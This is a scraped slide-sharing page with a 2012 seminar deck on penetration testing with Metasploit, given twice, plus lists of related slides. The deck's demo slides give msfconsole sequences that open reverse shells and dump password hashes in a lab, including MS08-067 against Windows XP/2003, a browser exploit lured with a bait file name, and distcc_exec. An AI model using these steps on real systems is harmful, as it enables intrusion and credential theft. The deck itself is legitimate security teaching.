Pentest with Metasploit

M.Syarifudin, ST, OSCP, OSWP
M.Syarifudin, ST, OSCP, OSWP Information Security Trainer
penetrationtesting withmetasploit Presented by Syarif ! Seminar IT Security Safe The System Sumedang, April 29 2012 STMIK Sumedang
Agenda • Why & What’s Penetration Testing ( Pentest ) • << back|track Overview • Metasploit Basics & Meterpreter • DEMO :)
Whoami • geek & Pentester • infosec trouble maker • InfoSec enthusiast • CyberCrime investigator • Lecture & Engineer
Why Pentest ? • Millions of dollars have been invested in security programs to protect critical infrastructure to prevent data breaches *1) • Penetration Test is one of the most effective ways to identify weaknesses and deficiencies in these programs *1)
What’s Penetration Testing • A method to evaluate the security of computer system / network • Practice ( attacking ) an IT System like a ‘hacker’ does • Find security holes ( weaknesses ) • Bypass security mechanism • Compromise an organization’s IT system security Must have permission from IT system owner ! illegal activity put you in Jail
Ethics • Think before act • Don’t be stupid • Don’t be malicious
Pentest Phases Vulnerability Analysis Information Gathering Exploitation Post Exploitation Reporting
<< back|track overview • Let’s Watch theVideo :)
<< back|track overview • . The Most Advanced Linux Security Distribution Open Source & Always be Developed for Security Professional Real World Pentesting Tools
<< back|track overview
<< back|track overview
What’s • Not just a tool, but an entire framework *1) • an Open source platform for writing security tools and exploits *2) • Easily build attack vectors to add its exploits, payloads, encoders, • Create and execute more advanced attack • Ruby based
Metasploit interfaces • MSFconsole • MSFcli • msfweb, msfgui ( discontinued ) • Metasploit Pro, Metasploit Express • Armitage
MSFconsole
MSFcli
Metasploit Terminology • Exploit : code that allow a pentester take some advantages of a flaw within system,application, or service *1) • Payload : code that we want the target system to execute ( few commands to be executed on the target system ) *1) • Shellcode : a set of instructions used as payload when exploitation occurs *1) • Module : a software that can be used by metasploit *1) • Listener : a component for waiting an incoming connection *1)
How does exploitation works attacker exploit + payload vulnerable server 1 exploit run , then payload run 2 3 Upload / Download data
Traditional PentestVs Metasploit Public Exploit Gathering Change offsets Replace ShellCode Load Metasploit Choose the target OS Use exploit SET Payload Execute Traditional Pentest Metasploit for Pentest
Meterpreter • as a payload after vulnerability is exploited *1) • Improve the post exploitation
Meterpreter Exploiting a vulnerability Select a meterpreter as a payload meterpreter shell
Meterpreter command
Meterpreter command
Meterpreter command
Meterpreter command
Meterpreter command
Pentest Scenario attacker vulnerable OS onVMware * : Ubuntu 8.04 metasploitable *
OS in the Lab • BackTrack 5 R 2 • IP address : 172.16.240.143 • Windows Xp SP 2 • IP address : 172.16.240.129 • Windows 2003 Server • IP address : 172.16.240.141 • Windows 7 • IP address : 172.16.240.142 • Ubuntu Linux 8.04 ( Metasploitable ) • IP address : 172.16.240.144
Windows XP Exploitation • msf > search windows/smb • msf > info exploit/windows/smb/ms08_067_netapi • msf > use exploit/windows/smb/ms08_067_netapi • msf exploit(ms08_067_netapi) > show payloads • msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129 • msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143 • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > exploit • meterpreter > background • session -l
Windows XP Post Exploitation • session -i 1 • meterpreter > getsystem -h • getuid • hashdump
Windows 2003 Server Exploitation • msf > search windows/smb • msf > info exploit/windows/smb/ms08_067_netapi • msf > use exploit/windows/smb/ms08_067_netapi • msf exploit(ms08_067_netapi) > show payloads • msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129 • msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143 • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > exploit • meterpreter > background • session -l
Windows 7 Exploitation • msf > use exploit/windows/browser/ms11_003_ie_css_import • msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms11_003_ie_css_import) > show options • msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.240.143 • msf exploit(ms11_003_ie_css_import) > set SRVPORT 80 • msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-naked.avi • msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.240.143 • msf exploit(ms11_003_ie_css_import) > set LPORT 443 • msf exploit(ms11_003_ie_css_import) > exploit Just wait until the victim open the url http://172.16.240.143:80/miyabi-naked.avi
Windows 7 Exploitation • msf exploit(ms11_003_ie_css_import) > sessions -l • msf exploit(ms11_003_ie_css_import) > sessions -i 1 • meterpreter > sysinfo • meterpreter > shell
Ubuntu 8.04 Metasploitable Exploitation • search distcc • use exploit/unix/misc/distcc_exec • show payloads • set PAYLOAD cmd/unix/reverse • show options • set rhost 172.16.240.144 • set lhost 172.16.240.143 • exploit
Any Question ? Contact me • website : http://fl3x.us • twitter : @fl3xu5
Greet & Thanks To • BackTrack Linux • Metasploit Team ( HD Moore & rapid7 ) • Offensive Security / Metasploit Unleashed • David Kennedy • Georgia Weidman
References ! ! • 1. Metasploit The Penetration Tester’s Guide : David Kennedy , Jim O’Gorman, Devon Kearns, Mati Aharoni • 2. http://www.metasploit.com • 3. http://www.offensive-security.com/metasploit- unleashed/Main_Page • 4. http://www.pentest-standard.org/index.php/ PTES_Technical_Guidelines
1 of 36

Pentest with Metasploit

Download to read offline
Technology

Pentest with Metasploit

M.Syarifudin, ST, OSCP, OSWP
M.Syarifudin, ST, OSCP, OSWP Information Security Trainer

Recommended

Metasploit by
MetasploitMetasploit
MetasploitInstitute of Information Security (IIS)
4.5K views25 slides
Metasploit framwork by
Metasploit framworkMetasploit framwork
Metasploit framworkDeepanshu Gajbhiye
3.9K views42 slides
Metasploit by
MetasploitMetasploit
MetasploitLalith Sai
438 views39 slides
Introduction To Exploitation & Metasploit by
Introduction To Exploitation & MetasploitIntroduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitRaghav Bisht
1.5K views21 slides
Metasploit by
MetasploitMetasploit
Metasploithenelpj
3.8K views20 slides
Nmap scripting engine by
Nmap scripting engineNmap scripting engine
Nmap scripting enginen|u - The Open Security Community
5K views26 slides

More Related Content

What's hot

Building an Empire with PowerShell by
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShellWill Schroeder
22.3K views56 slides
Nmap basics by
Nmap basicsNmap basics
Nmap basicsitmind4u
13K views16 slides
Recon with Nmap by
Recon with Nmap Recon with Nmap
Recon with Nmap OWASP Delhi
1.7K views32 slides
Finalppt metasploit by
Finalppt metasploitFinalppt metasploit
Finalppt metasploitdevilback
6.5K views57 slides
Ekoparty 2017 - The Bug Hunter's Methodology by
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
7.9K views58 slides
Hacking With Nmap - Scanning Techniques by
Hacking With Nmap - Scanning TechniquesHacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning Techniquesamiable_indian
34.3K views28 slides

What's hot(20)

Building an Empire with PowerShell by Will Schroeder
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShell
Will Schroeder22.3K views
Nmap basics by itmind4u
Nmap basicsNmap basics
Nmap basics
itmind4u13K views
Recon with Nmap by OWASP Delhi
Recon with Nmap Recon with Nmap
Recon with Nmap
OWASP Delhi1.7K views
Finalppt metasploit by devilback
Finalppt metasploitFinalppt metasploit
Finalppt metasploit
devilback6.5K views
Ekoparty 2017 - The Bug Hunter's Methodology by bugcrowd
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
bugcrowd7.9K views
Hacking With Nmap - Scanning Techniques by amiable_indian
Hacking With Nmap - Scanning TechniquesHacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning Techniques
amiable_indian34.3K views
Nmap tutorial by Varun Kakumani
Nmap tutorialNmap tutorial
Nmap tutorial
Varun Kakumani3K views
Metaploit by Ajinkya Pathak
MetaploitMetaploit
Metaploit
Ajinkya Pathak2.8K views
Kali Linux Installation - VMware by Ronan Dunne, CEH, SSCP
Kali Linux Installation - VMwareKali Linux Installation - VMware
Kali Linux Installation - VMware
Ronan Dunne, CEH, SSCP27.6K views
Metasploit framework in Network Security by Ashok Reddy Medikonda
Metasploit framework in Network SecurityMetasploit framework in Network Security
Metasploit framework in Network Security
Ashok Reddy Medikonda624 views
Metasploit El Kitabı by BGA Cyber Security
Metasploit El KitabıMetasploit El Kitabı
Metasploit El Kitabı
BGA Cyber Security36.7K views
Nmap Hacking Guide by Aryan G
Nmap Hacking GuideNmap Hacking Guide
Nmap Hacking Guide
Aryan G1.8K views
Metasploit - Basic and Android Demo by Arpit Agarwal
Metasploit - Basic and Android DemoMetasploit - Basic and Android Demo
Metasploit - Basic and Android Demo
Arpit Agarwal513 views
Pen-Testing with Metasploit by Mohammed Danish Amber
Pen-Testing with MetasploitPen-Testing with Metasploit
Pen-Testing with Metasploit
Mohammed Danish Amber2.3K views
NMAP - The Network Scanner by n|u - The Open Security Community
NMAP - The Network ScannerNMAP - The Network Scanner
NMAP - The Network Scanner
n|u - The Open Security Community2.8K views
Introduction to penetration testing by Nezar Alazzabi
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
Nezar Alazzabi1.9K views
Next Generation War: EDR vs RED TEAM by BGA Cyber Security
Next Generation War: EDR vs RED TEAMNext Generation War: EDR vs RED TEAM
Next Generation War: EDR vs RED TEAM
BGA Cyber Security1.5K views
NMap by Pritesh Raka
NMapNMap
NMap
Pritesh Raka1K views
Windows attacks - AT is the new black by Chris Gates
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
Chris Gates10.9K views
Mitre ATT&CK Kullanarak Etkin Saldırı Tespiti by BGA Cyber Security
Mitre ATT&CK Kullanarak Etkin Saldırı TespitiMitre ATT&CK Kullanarak Etkin Saldırı Tespiti
Mitre ATT&CK Kullanarak Etkin Saldırı Tespiti
BGA Cyber Security6.6K views

Viewers also liked

Social Network Security & Backdooring email by
Social Network Security & Backdooring emailSocial Network Security & Backdooring email
Social Network Security & Backdooring emailM.Syarifudin, ST, OSCP, OSWP
16.6K views20 slides
Wireless LAN Security-Bimtek Kominfo by
Wireless LAN Security-Bimtek KominfoWireless LAN Security-Bimtek Kominfo
Wireless LAN Security-Bimtek KominfoM.Syarifudin, ST, OSCP, OSWP
13.3K views10 slides
iCrOSS 2013_Pentest by
iCrOSS 2013_PentestiCrOSS 2013_Pentest
iCrOSS 2013_PentestM.Syarifudin, ST, OSCP, OSWP
14.8K views39 slides
IPTV Security by
IPTV SecurityIPTV Security
IPTV SecurityM.Syarifudin, ST, OSCP, OSWP
18.4K views17 slides
My pwk & oscp journey by
My pwk & oscp journeyMy pwk & oscp journey
My pwk & oscp journeyM.Syarifudin, ST, OSCP, OSWP
25.5K views14 slides
Prepare Yourself to Become Infosec Professional by
Prepare Yourself to Become Infosec ProfessionalPrepare Yourself to Become Infosec Professional
Prepare Yourself to Become Infosec ProfessionalM.Syarifudin, ST, OSCP, OSWP
14.4K views26 slides

Viewers also liked(7)

Social Network Security & Backdooring email by M.Syarifudin, ST, OSCP, OSWP
Social Network Security & Backdooring emailSocial Network Security & Backdooring email
Social Network Security & Backdooring email
M.Syarifudin, ST, OSCP, OSWP 16.6K views
Wireless LAN Security-Bimtek Kominfo by M.Syarifudin, ST, OSCP, OSWP
Wireless LAN Security-Bimtek KominfoWireless LAN Security-Bimtek Kominfo
Wireless LAN Security-Bimtek Kominfo
M.Syarifudin, ST, OSCP, OSWP 13.3K views
iCrOSS 2013_Pentest by M.Syarifudin, ST, OSCP, OSWP
iCrOSS 2013_PentestiCrOSS 2013_Pentest
iCrOSS 2013_Pentest
M.Syarifudin, ST, OSCP, OSWP 14.8K views
IPTV Security by M.Syarifudin, ST, OSCP, OSWP
IPTV SecurityIPTV Security
IPTV Security
M.Syarifudin, ST, OSCP, OSWP 18.4K views
My pwk & oscp journey by M.Syarifudin, ST, OSCP, OSWP
My pwk & oscp journeyMy pwk & oscp journey
My pwk & oscp journey
M.Syarifudin, ST, OSCP, OSWP 25.5K views
Prepare Yourself to Become Infosec Professional by M.Syarifudin, ST, OSCP, OSWP
Prepare Yourself to Become Infosec ProfessionalPrepare Yourself to Become Infosec Professional
Prepare Yourself to Become Infosec Professional
M.Syarifudin, ST, OSCP, OSWP 14.4K views
Information gath by M.Syarifudin, ST, OSCP, OSWP
Information gathInformation gath
Information gath
M.Syarifudin, ST, OSCP, OSWP 14K views

Similar to Pentest with Metasploit

Compromising windows 8 with metasploit’s exploit by
Compromising windows 8 with metasploit’s exploitCompromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploitIOSR Journals
548 views4 slides
Practical White Hat Hacker Training - Post Exploitation by
Practical White Hat Hacker Training - Post ExploitationPractical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post ExploitationPRISMA CSI
4.6K views72 slides
Windows 7 client performance talk - Jeff Stokes by
Windows 7 client performance talk - Jeff StokesWindows 7 client performance talk - Jeff Stokes
Windows 7 client performance talk - Jeff StokesJeff Stokes
53 views110 slides
Breach and attack simulation tools by
Breach and attack simulation toolsBreach and attack simulation tools
Breach and attack simulation toolsBangladesh Network Operators Group
4.3K views40 slides
Metasploit for Penetration Testing: Beginner Class by
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassGeorgia Weidman
31.9K views43 slides
Pentesting with linux by
Pentesting with linuxPentesting with linux
Pentesting with linuxHammad Ahmed Khawaja
353 views24 slides

Similar to Pentest with Metasploit(20)

Compromising windows 8 with metasploit’s exploit by IOSR Journals
Compromising windows 8 with metasploit’s exploitCompromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploit
IOSR Journals548 views
Practical White Hat Hacker Training - Post Exploitation by PRISMA CSI
Practical White Hat Hacker Training - Post ExploitationPractical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post Exploitation
PRISMA CSI4.6K views
Windows 7 client performance talk - Jeff Stokes by Jeff Stokes
Windows 7 client performance talk - Jeff StokesWindows 7 client performance talk - Jeff Stokes
Windows 7 client performance talk - Jeff Stokes
Jeff Stokes53 views
Breach and attack simulation tools by Bangladesh Network Operators Group
Breach and attack simulation toolsBreach and attack simulation tools
Breach and attack simulation tools
Bangladesh Network Operators Group4.3K views
Metasploit for Penetration Testing: Beginner Class by Georgia Weidman
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner Class
Georgia Weidman31.9K views
Pentesting with linux by Hammad Ahmed Khawaja
Pentesting with linuxPentesting with linux
Pentesting with linux
Hammad Ahmed Khawaja353 views
Practical White Hat Hacker Training - Exploitation by PRISMA CSI
Practical White Hat Hacker Training - ExploitationPractical White Hat Hacker Training - Exploitation
Practical White Hat Hacker Training - Exploitation
PRISMA CSI1.5K views
Metasploit by Parth Sahu
MetasploitMetasploit
Metasploit
Parth Sahu68 views
unit 2 confinement techniques.pdf by RohitGautam261127
unit 2 confinement techniques.pdfunit 2 confinement techniques.pdf
unit 2 confinement techniques.pdf
RohitGautam261127100 views
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas... by Lastline, Inc.
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Full-System Emulation Achieving Successful Automated Dynamic Analysis of Evas...
Lastline, Inc.1.3K views
James Jara Portfolio 2014 - InfoSec White Paper- Part 5 by James Jara
James Jara Portfolio 2014 - InfoSec White Paper- Part 5James Jara Portfolio 2014 - InfoSec White Paper- Part 5
James Jara Portfolio 2014 - InfoSec White Paper- Part 5
James Jara1.9K views
Metasploitation part-1 (murtuja) by ClubHack
Metasploitation part-1 (murtuja)Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)
ClubHack1.6K views
Backtrack Manual Part8 by Nutan Kumar Panda
Backtrack Manual Part8Backtrack Manual Part8
Backtrack Manual Part8
Nutan Kumar Panda1.2K views
metaploit framework by Le Quyen
metaploit frameworkmetaploit framework
metaploit framework
Le Quyen564 views
L27 by NathannyabvureMapisa
L27L27
L27
NathannyabvureMapisa44 views
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기 by Ji-Woong Choi
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
Ji-Woong Choi6.6K views
RIoT (Raiding Internet of Things) by Jacob Holcomb by Priyanka Aash
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
Priyanka Aash1.1K views
MuleSoft Online MeetUp 03_11_2020 by DianeKesler1
MuleSoft Online MeetUp 03_11_2020MuleSoft Online MeetUp 03_11_2020
MuleSoft Online MeetUp 03_11_2020
DianeKesler11.3K views
Breaking hardware enforced security with hypervisors by Priyanka Aash
Breaking hardware enforced security with hypervisorsBreaking hardware enforced security with hypervisors
Breaking hardware enforced security with hypervisors
Priyanka Aash626 views
Countering Innovative Sandbox Evasion Techniques Used by Malware by Tyler Borosavage
Countering Innovative Sandbox Evasion Techniques Used by MalwareCountering Innovative Sandbox Evasion Techniques Used by Malware
Countering Innovative Sandbox Evasion Techniques Used by Malware
Tyler Borosavage895 views

Recently uploaded

Info Session November 2023.pdf by
Info Session November 2023.pdfInfo Session November 2023.pdf
Info Session November 2023.pdfAleksandraKoprivica4
12 views15 slides
20231123_Camunda Meetup Vienna.pdf by
20231123_Camunda Meetup Vienna.pdf20231123_Camunda Meetup Vienna.pdf
20231123_Camunda Meetup Vienna.pdfPhactum Softwareentwicklung GmbH
41 views73 slides
Serverless computing with Google Cloud (2023-24) by
Serverless computing with Google Cloud (2023-24)Serverless computing with Google Cloud (2023-24)
Serverless computing with Google Cloud (2023-24)wesley chun
11 views33 slides
Kyo - Functional Scala 2023.pdf by
Kyo - Functional Scala 2023.pdfKyo - Functional Scala 2023.pdf
Kyo - Functional Scala 2023.pdfFlavio W. Brasil
368 views92 slides
Automating a World-Class Technology Conference; Behind the Scenes of CiscoLive by
Automating a World-Class Technology Conference; Behind the Scenes of CiscoLiveAutomating a World-Class Technology Conference; Behind the Scenes of CiscoLive
Automating a World-Class Technology Conference; Behind the Scenes of CiscoLiveNetwork Automation Forum
31 views35 slides
TouchLog: Finger Micro Gesture Recognition Using Photo-Reflective Sensors by
TouchLog: Finger Micro Gesture Recognition Using Photo-Reflective SensorsTouchLog: Finger Micro Gesture Recognition Using Photo-Reflective Sensors
TouchLog: Finger Micro Gesture Recognition Using Photo-Reflective Sensorssugiuralab
19 views15 slides

Recently uploaded(20)

Info Session November 2023.pdf by AleksandraKoprivica4
Info Session November 2023.pdfInfo Session November 2023.pdf
Info Session November 2023.pdf
AleksandraKoprivica412 views
20231123_Camunda Meetup Vienna.pdf by Phactum Softwareentwicklung GmbH
20231123_Camunda Meetup Vienna.pdf20231123_Camunda Meetup Vienna.pdf
20231123_Camunda Meetup Vienna.pdf
Phactum Softwareentwicklung GmbH41 views
Serverless computing with Google Cloud (2023-24) by wesley chun
Serverless computing with Google Cloud (2023-24)Serverless computing with Google Cloud (2023-24)
Serverless computing with Google Cloud (2023-24)
wesley chun11 views
Kyo - Functional Scala 2023.pdf by Flavio W. Brasil
Kyo - Functional Scala 2023.pdfKyo - Functional Scala 2023.pdf
Kyo - Functional Scala 2023.pdf
Flavio W. Brasil368 views
Automating a World-Class Technology Conference; Behind the Scenes of CiscoLive by Network Automation Forum
Automating a World-Class Technology Conference; Behind the Scenes of CiscoLiveAutomating a World-Class Technology Conference; Behind the Scenes of CiscoLive
Automating a World-Class Technology Conference; Behind the Scenes of CiscoLive
Network Automation Forum31 views
TouchLog: Finger Micro Gesture Recognition Using Photo-Reflective Sensors by sugiuralab
TouchLog: Finger Micro Gesture Recognition Using Photo-Reflective SensorsTouchLog: Finger Micro Gesture Recognition Using Photo-Reflective Sensors
TouchLog: Finger Micro Gesture Recognition Using Photo-Reflective Sensors
sugiuralab19 views
Network Source of Truth and Infrastructure as Code revisited by Network Automation Forum
Network Source of Truth and Infrastructure as Code revisitedNetwork Source of Truth and Infrastructure as Code revisited
Network Source of Truth and Infrastructure as Code revisited
Network Automation Forum26 views
Scaling Knowledge Graph Architectures with AI by Enterprise Knowledge
Scaling Knowledge Graph Architectures with AIScaling Knowledge Graph Architectures with AI
Scaling Knowledge Graph Architectures with AI
Enterprise Knowledge30 views
Democratising digital commerce in India-Report by Kapil Khandelwal (KK)
Democratising digital commerce in India-ReportDemocratising digital commerce in India-Report
Democratising digital commerce in India-Report
Kapil Khandelwal (KK)15 views
SAP Automation Using Bar Code and FIORI.pdf by Virendra Rai, PMP
SAP Automation Using Bar Code and FIORI.pdfSAP Automation Using Bar Code and FIORI.pdf
SAP Automation Using Bar Code and FIORI.pdf
Virendra Rai, PMP23 views
virtual reality.pptx by G036GaikwadSnehal
virtual reality.pptxvirtual reality.pptx
virtual reality.pptx
G036GaikwadSnehal11 views
HTTP headers that make your website go faster - devs.gent November 2023 by Thijs Feryn
HTTP headers that make your website go faster - devs.gent November 2023HTTP headers that make your website go faster - devs.gent November 2023
HTTP headers that make your website go faster - devs.gent November 2023
Thijs Feryn22 views
Igniting Next Level Productivity with AI-Infused Data Integration Workflows by Safe Software
Igniting Next Level Productivity with AI-Infused Data Integration Workflows Igniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration Workflows
Safe Software263 views
STPI OctaNE CoE Brochure.pdf by madhurjyapb
STPI OctaNE CoE Brochure.pdfSTPI OctaNE CoE Brochure.pdf
STPI OctaNE CoE Brochure.pdf
madhurjyapb14 views
Zero to Automated in Under a Year by Network Automation Forum
Zero to Automated in Under a YearZero to Automated in Under a Year
Zero to Automated in Under a Year
Network Automation Forum15 views
Evolving the Network Automation Journey from Python to Platforms by Network Automation Forum
Evolving the Network Automation Journey from Python to PlatformsEvolving the Network Automation Journey from Python to Platforms
Evolving the Network Automation Journey from Python to Platforms
Network Automation Forum13 views
The details of description: Techniques, tips, and tangents on alternative tex... by BookNet Canada
The details of description: Techniques, tips, and tangents on alternative tex...The details of description: Techniques, tips, and tangents on alternative tex...
The details of description: Techniques, tips, and tangents on alternative tex...
BookNet Canada127 views
Tunable Laser (1).pptx by Hajira Mahmood
Tunable Laser (1).pptxTunable Laser (1).pptx
Tunable Laser (1).pptx
Hajira Mahmood24 views
METHOD AND SYSTEM FOR PREDICTING OPTIMAL LOAD FOR WHICH THE YIELD IS MAXIMUM ... by Prity Khastgir IPR Strategic India Patent Attorney Amplify Innovation
METHOD AND SYSTEM FOR PREDICTING OPTIMAL LOAD FOR WHICH THE YIELD IS MAXIMUM ...METHOD AND SYSTEM FOR PREDICTING OPTIMAL LOAD FOR WHICH THE YIELD IS MAXIMUM ...
METHOD AND SYSTEM FOR PREDICTING OPTIMAL LOAD FOR WHICH THE YIELD IS MAXIMUM ...
Prity Khastgir IPR Strategic India Patent Attorney Amplify Innovation29 views
【USB韌體設計課程】精選講義節錄-USB的列舉過程_艾鍗學院 by IttrainingIttraining
【USB韌體設計課程】精選講義節錄-USB的列舉過程_艾鍗學院【USB韌體設計課程】精選講義節錄-USB的列舉過程_艾鍗學院
【USB韌體設計課程】精選講義節錄-USB的列舉過程_艾鍗學院
IttrainingIttraining52 views

Pentest with Metasploit

  • 1. penetrationtesting withmetasploit Presented by Syarif ! Seminar IT Security Safe The System Sumedang, April 29 2012 STMIK Sumedang
  • 2. Agenda • Why & What’s Penetration Testing ( Pentest ) • << back|track Overview • Metasploit Basics & Meterpreter • DEMO :)
  • 3. Whoami • geek & Pentester • infosec trouble maker • InfoSec enthusiast • CyberCrime investigator • Lecture & Engineer
  • 4. Why Pentest ? • Millions of dollars have been invested in security programs to protect critical infrastructure to prevent data breaches *1) • Penetration Test is one of the most effective ways to identify weaknesses and deficiencies in these programs *1)
  • 5. What’s Penetration Testing • A method to evaluate the security of computer system / network • Practice ( attacking ) an IT System like a ‘hacker’ does • Find security holes ( weaknesses ) • Bypass security mechanism • Compromise an organization’s IT system security Must have permission from IT system owner ! illegal activity put you in Jail
  • 6. Ethics • Think before act • Don’t be stupid • Don’t be malicious
  • 7. Pentest Phases Vulnerability Analysis Information Gathering Exploitation Post Exploitation Reporting
  • 8. << back|track overview • Let’s Watch theVideo :)
  • 9. << back|track overview • . The Most Advanced Linux Security Distribution Open Source & Always be Developed for Security Professional Real World Pentesting Tools
  • 12. What’s • Not just a tool, but an entire framework *1) • an Open source platform for writing security tools and exploits *2) • Easily build attack vectors to add its exploits, payloads, encoders, • Create and execute more advanced attack • Ruby based
  • 13. Metasploit interfaces • MSFconsole • MSFcli • msfweb, msfgui ( discontinued ) • Metasploit Pro, Metasploit Express • Armitage
  • 16. Metasploit Terminology • Exploit : code that allow a pentester take some advantages of a flaw within system,application, or service *1) • Payload : code that we want the target system to execute ( few commands to be executed on the target system ) *1) • Shellcode : a set of instructions used as payload when exploitation occurs *1) • Module : a software that can be used by metasploit *1) • Listener : a component for waiting an incoming connection *1)
  • 17. How does exploitation works attacker exploit + payload vulnerable server 1 exploit run , then payload run 2 3 Upload / Download data
  • 18. Traditional PentestVs Metasploit Public Exploit Gathering Change offsets Replace ShellCode Load Metasploit Choose the target OS Use exploit SET Payload Execute Traditional Pentest Metasploit for Pentest
  • 19. Meterpreter • as a payload after vulnerability is exploited *1) • Improve the post exploitation
  • 20. Meterpreter Exploiting a vulnerability Select a meterpreter as a payload meterpreter shell
  • 26. Pentest Scenario attacker vulnerable OS onVMware * : Ubuntu 8.04 metasploitable *
  • 27. OS in the Lab • BackTrack 5 R 2 • IP address : 172.16.240.143 • Windows Xp SP 2 • IP address : 172.16.240.129 • Windows 2003 Server • IP address : 172.16.240.141 • Windows 7 • IP address : 172.16.240.142 • Ubuntu Linux 8.04 ( Metasploitable ) • IP address : 172.16.240.144
  • 28. Windows XP Exploitation • msf > search windows/smb • msf > info exploit/windows/smb/ms08_067_netapi • msf > use exploit/windows/smb/ms08_067_netapi • msf exploit(ms08_067_netapi) > show payloads • msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129 • msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143 • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > exploit • meterpreter > background • session -l
  • 29. Windows XP Post Exploitation • session -i 1 • meterpreter > getsystem -h • getuid • hashdump
  • 30. Windows 2003 Server Exploitation • msf > search windows/smb • msf > info exploit/windows/smb/ms08_067_netapi • msf > use exploit/windows/smb/ms08_067_netapi • msf exploit(ms08_067_netapi) > show payloads • msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129 • msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143 • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > exploit • meterpreter > background • session -l
  • 31. Windows 7 Exploitation • msf > use exploit/windows/browser/ms11_003_ie_css_import • msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms11_003_ie_css_import) > show options • msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.240.143 • msf exploit(ms11_003_ie_css_import) > set SRVPORT 80 • msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-naked.avi • msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.240.143 • msf exploit(ms11_003_ie_css_import) > set LPORT 443 • msf exploit(ms11_003_ie_css_import) > exploit Just wait until the victim open the url http://172.16.240.143:80/miyabi-naked.avi
  • 32. Windows 7 Exploitation • msf exploit(ms11_003_ie_css_import) > sessions -l • msf exploit(ms11_003_ie_css_import) > sessions -i 1 • meterpreter > sysinfo • meterpreter > shell
  • 33. Ubuntu 8.04 Metasploitable Exploitation • search distcc • use exploit/unix/misc/distcc_exec • show payloads • set PAYLOAD cmd/unix/reverse • show options • set rhost 172.16.240.144 • set lhost 172.16.240.143 • exploit
  • 34. Any Question ? Contact me • website : http://fl3x.us • twitter : @fl3xu5
  • 35. Greet & Thanks To • BackTrack Linux • Metasploit Team ( HD Moore & rapid7 ) • Offensive Security / Metasploit Unleashed • David Kennedy • Georgia Weidman
  • 36. References ! ! • 1. Metasploit The Penetration Tester’s Guide : David Kennedy , Jim O’Gorman, Devon Kearns, Mati Aharoni • 2. http://www.metasploit.com • 3. http://www.offensive-security.com/metasploit- unleashed/Main_Page • 4. http://www.pentest-standard.org/index.php/ PTES_Technical_Guidelines